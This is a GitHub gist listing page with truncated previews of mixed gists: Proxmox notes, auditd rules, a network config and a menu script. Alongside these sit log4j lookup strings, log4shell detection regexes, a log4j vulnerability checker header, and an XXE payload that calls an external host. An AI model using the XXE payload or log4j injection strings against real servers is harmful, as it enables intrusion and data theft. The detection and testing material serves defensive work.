Skip to content

Instantly share code, notes, and snippets.

View KrE80r's full-sized avatar

KrE80r

36 followers · 22 following
View GitHub Profile
@scyto
scyto / proxmox.md
Last active September 19, 2024 21:39
proxmox cluster proof of concept

ProxMox Cluster - Soup-to-Nutz

aka what i did to get from nothing to done.

note: these are designed to be primarily a re-install guide for myself (writing things down helps me memorize the knowledge), as such don't take any of this on blind faith - some areas are well tested and the docs are very robust, some items, less so). YMMV

Purpose of Proxmox cluster project

Required Outomces of cluster project

@ruevaughn
ruevaughn / 1_top+hacker_methodologies.md
Last active September 10, 2024 18:56
Hacker Methodologies & Tools (NEW)

The Top Hacker Methodologies & Tools Notes

By Chase. ** *

Nuclei Templates

Concrete5 CMS : Identification, Mass Hunting, Nuclei Template Writing & Reporting

@bugbountynights
bugbountynights / log4j-keywords
Last active September 7, 2024 08:39
${ctx:loginId}
${map:type}
${filename}
${date:MM-dd-yyyy}
${docker:containerId}
${docker:containerName}
${docker:imageName}
${env:USER}
${event:Marker}
${mdc:UserId}
@karanlyons
karanlyons / log4shell_regexes.py
Last active March 7, 2022 03:49
log4shell Regexes
import re
from urllib.parse import unquote
FLAGS = re.IGNORECASE | re.DOTALL
ESC_DOLLAR = r'(?:\$|[\\%]u0024||\\x24|\\0?44|%24)'
ESC_LCURLY = r'(?:\{|[\\%]u007B|\\x7B|\\173|%7B)'
ESC_RCURLY = r'(?:\}|[\\%]u007D|\\x7D|\\175|%7D)'
_U_PERCENT_ESCAPE_RE = re.compile(r'%(u[0-9a-f]{4})', flags=FLAGS)
_PERCENT_ESCAPE_RE = re.compile(r'%[0-9a-f]{2}', flags=FLAGS)
@byt3bl33d3r
byt3bl33d3r / log4j_rce_check.py
Created December 10, 2021 06:02
Python script to detect if an HTTP server is potentially vulnerable to the log4j 0day RCE (https://www.lunasec.io/docs/blog/log4j-zero-day/)
#! /usr/bin/env python3
'''
Needs Requests (pip3 install requests)
Author: Marcello Salvati, Twitter: @byt3bl33d3r
License: DWTFUWANTWTL (Do What Ever the Fuck You Want With This License)
This should allow you to detect if something is potentially exploitable to the log4j 0day dropped on December 9th 2021.
@coh7eiqu8thaBu
coh7eiqu8thaBu / audit.rules
Created December 9, 2017 18:24 — forked from Neo23x0/audit.rules
Linux Auditd Best Practice Configuration
# Linux Audit Daemon - Best Practice Configuration
# /etc/audit/audit.rules
#
# Based on rules published here:
# Gov.uk auditd rules
# https://github.com/gds-operations/puppet-auditd/pull/1
# CentOS 7 hardening
# https://highon.coffee/blog/security-harden-centos-7/#auditd---audit-daemon
# Linux audit repo
# https://github.com/linux-audit/audit-userspace/tree/master/rules
@staaldraad
staaldraad / XXE_payloads
Last active August 16, 2024 12:44
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@jpawlowski
jpawlowski / msys_hetzner-etc_network_interfaces
Created August 12, 2012 12:06
Debian network configuration for Proxmox VE server running on a Hetzner host
# /etc/network/interfaces
#
auto lo
iface lo inet loopback
# device: eth0
iface eth0 inet manual
# IPv4 bridge
# (connect ONLY your firewall/router KVM instance here, this is the WAN device!)
@abishur
abishur / menu_launcher.py
Last active July 28, 2024 19:57
A simple menu system using python for the Terminal (Framebufer)
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Topmenu and the submenus are based of the example found at this location http://blog.skeltonnetworks.com/2010/03/python-curses-custom-menu/
# The rest of the work was done by Matthew Bennett and he requests you keep these two mentions when you reuse the code :-)
# Basic code refactoring by Andrew Scheller
from time import sleep
import curses, os #curses is the interface for capturing key presses on the menu, os launches the files
screen = curses.initscr() #initializes a new window for capturing key presses
curses.noecho() # Disables automatic echoing of key presses (prevents program from input each key twice)